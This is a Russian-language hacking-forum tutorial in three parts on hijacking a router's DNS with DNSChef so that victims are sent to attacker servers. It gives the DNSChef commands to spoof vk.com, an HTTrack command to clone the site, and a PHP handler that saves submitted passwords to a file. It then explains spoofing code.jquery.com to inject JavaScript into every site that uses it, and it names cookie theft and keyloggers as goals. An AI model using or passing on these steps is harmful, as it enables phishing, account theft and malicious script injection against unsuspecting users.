Подмена dns на роутере для работы

battarismos

Активный участник
ДРУЗЬЯ ФОРУМА

battarismos

Активный участник
ДРУЗЬЯ ФОРУМА
Регистрация
23 Сен 2020
Сообщения
92
Реакции
5
Репутация
8
Итак, сегодня мы разберем поднятие нашего DNSChef. DNSChef - это DNS прокси, который поможет нам поднять фальшивый DNS, который мы подставим вместо нормально, который выдает нам провайдер.
DNS сервер - это такой же компьютер, где хранятся наши ip адреса. Когда мы вводим адрес сайта в браузере, обращаемся к DNS - серверу и говорим: "Эй, железяка, мне нужен ip адрес, на котором расположен этот сайт", он выдает нам ip, после переходим по нему и получаем в нашем браузере содержимое главной страницы. Грубое объяснения, но довольно таки понятно. Плюс, изображение:

Когда мы подставляем наш DNS сервер в роутер, то это так же работающий сервер, но мы уже можем перенаправлять пользователя на наш сайт. Т.е. теперь, когда жертва вводит vk.com, наш dns подсовывает жертве не настоящий ip адрес, а ip нашего сервера, где мы подняли фейк vk.com

Итак, что мы имеем:
1. VPS сервер, где поднимем наш dns сервак и фейковый сайт.
2. Роутер с возможностью изменения DNS, ну в современных вроде во всех можно. В моем случае имею Mikrotik hap lite
3. DNSChef
Практика.
Здесь мы опишем подробно, как и где в роутере нам нужно подменить наш DNS адрес и конечно же установка и настройка DNSChef.

Установка и настройка DNSChef
Начнем с установки DNSChef, я устанавливаю и буду делать все на VPS Ubuntu 14.04. Мы можете взять себе VPS и ставить удобный дистрибутив. Хостера также можете выбрать любого, но желательно конечно, чтобы дата-центры были за границей. У меня на ihor.ru в России, так как на этом VPS никаких махинаций не провожу. Из тех, которые за границей и довольно абузоустойчивый, могу порекомендовать zomro.com.
Для удобной настройки и добавления доменов и бд установим также на сервак панель VestaCP.
Думаю с этим у вас проблем не возникнет.
Дальше установим DNSChef:

sudo apt-get install python-ipy
sudo pip install dnslib
git clone

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.


unzip dnschef*
cd dnschef*

Запускаем наш DNSChef и мы должны увидеть это:

Видим, что DNSChef запускается нормально. Теперь мы можем запустить и указать, какой домен будет фейковым и на каком ip будет лежать наш ip адрес. Запускаем все это дело таким образом:
python dnschef.py -i IP_DNS_Прокси --fakeip IP_сервера --fakedomains vk.com

Подмена DNS в роутере и создание домена

После этого идем и подставляем наш IP прокси в роутер. Как изменить DNS у вас на роутере можете найти в инете.

Готово. Дальше идем добавлять наш фейковый домен в VestaCP.

Домен добавили, когда мы это сделали через VestaCP, она автоматически настраивает и создает наш виртуальный хост.
Для примера создам тестовый файл index.html в папке vk.com с содержимым

И теперь если мы подключены к инету через роутер, где совершили подмену, то при переходе на другие сайты будет все работать правильно, а при переходе на vk.com, то сервер будет перенаправлять на наш и получим такое:

Вроде ничего не пропустил. Ну если что упомяните в комментах и разберем.
В итоге мы разобрали установку и настройку DNSChef и подмену DNS в нашем роутере.
Итак, если помните в прошлой статье и написал о поднятии dns – прокси и подстановки нашего фейкового dns.
Сегодня продолжим и разберем, как мы будем граббить (делать копию) сайта и будем похищать пароли.

[0] – Немного теории. Что у нас есть?
Итак, давайте подробнее. Какими будут наши шаги:
1. Мы будем копировать сайт, который мы хотим подделать и использовать для фишинга. Делать я это буду с помощью программки HTTrack.
2. После чего переделам форму авторизации и с помощью мини php скрипта, будем сохранять полученные доступы в файл.

На этом все, это все на минимуме, без каких-либо наворотов, тут уже каждый может под себя дорабатывать. От теории перейдем к практике и разберем поподробнее.

[1] – Практика.
[1.1] – Граббинг сайта.

Итак, в первой части, для примера мы брали vk.com. Сейчас давайте, сделаем его копию, и зальем к нам на сервак, вместо того индексного файла. Сделаем это такой командой, с помощью HTTrack:
httrack

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

--headers "Accept-Language: ru-RU,ru;q=0.5" -r2 -F "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" -O "/home/admin/web/vk.com/public_html"
Тут мы указываем url сайта, хедер для русской версии ВК, юзер-агент и куда будем копировать. После граббинга в итоге получаем такое содержимое:


Копию сайта сделали. Теперь перейдем к коду для изменении формы авторизации и написании нашего мини-скрипта.

[1.2] - Получаем доступы к аккаунту

Для того чтобы получать данные, которые пользователь вводит в форме, значение action, просто поменяем, а адрес нашего скрипта, где мы будем принимать данные.
В домашней директории создадим файл handler.php с содержимым: $file = 'hack.txt';
file_put_contents($file, print_r($_POST, true), FILE_APPEND);
А на главной странице фейка, в параметр action подставим handler.php

Теперь при вводе данных и отправке их при нажатии кнопки, данные отправляются в файл handler.php и там обрабатываются и в виде массива сохраняется в файле

Вуаля, таким образом мы можем вернуть наш взломанный аккаунт, соседом.
На этом закончим 2ою часть. Всем удачи и не нарушайте закон !



Всем Салам. Вот уже 3я часть серии статей про подмену DNS в роутере. Мы уже разобрали, как настроить все, грабить сайт и похищать пароли. Сегодня, мы будем разбирать подстановку рекламы в браузер. Я давно еще искал информацию про такую реализацию, но нигде так и не нашел. И тут пришлось продумывать и реализовывать самому.

[0] - Немного теории.

Все это дело мы будем реализовывать, с помощью создания фейка CDN jQuery. Выбрал данный CDN потому что, он достаточно популярен и используется на множестве сайтов. И подменив code.jquery.com на свой фейк, мы сможем отображать рекламу и все что захотим на всех тех сайтах, где есть подключенный CDN jQuery, который по адресу code.jquery.com.
Кроме подстановки рекламы, мы можем делать еще много чего, что нам позволяет JavaScript. Например, как минимум своровать куки жертвы, внедрить кейлоггер и многое многое.

[1] - Практика.

Поднимаем сайт (code.jquery.com) через вестуСП и DNSChef, как я уже описывал в первой части и уже к нам на сайт копируем наш JS файл и можем уже добавлять свой код, который будет делать то что мы хотим на сайте жертвы.



С фейком у нас все готово. С JS особо не дружу, поэтому реализовал самый минимум, обычную всплывающую форму с рекламой. Если кто хорошо дружит с JS, можете предложить варианты баннеров, например чтобы всплывала в углу и всякое такое.
После того, как мы подняли фейк и скопировали к нам добавляем в самом низу наш код, в моем случае это:

$(function() {
$( "body" ).dialog({
height: 500,
width: 550,
modal: true,
autoOpen: false
});
setTimeout(function () {
$("body").dialog("open");
}, 3000)
});


Здесь мы тупо цепляемся к тегу body и через 3 секунды после загрузки страницы подгружаем наше окно с рекламой.

В итоге, у нас пользователь никак все это дело не заподозрит и мы можем делать все что придет в нашу больную голову при условии, что есть знания по JS или есть желание эти знания получить.
 
Сверху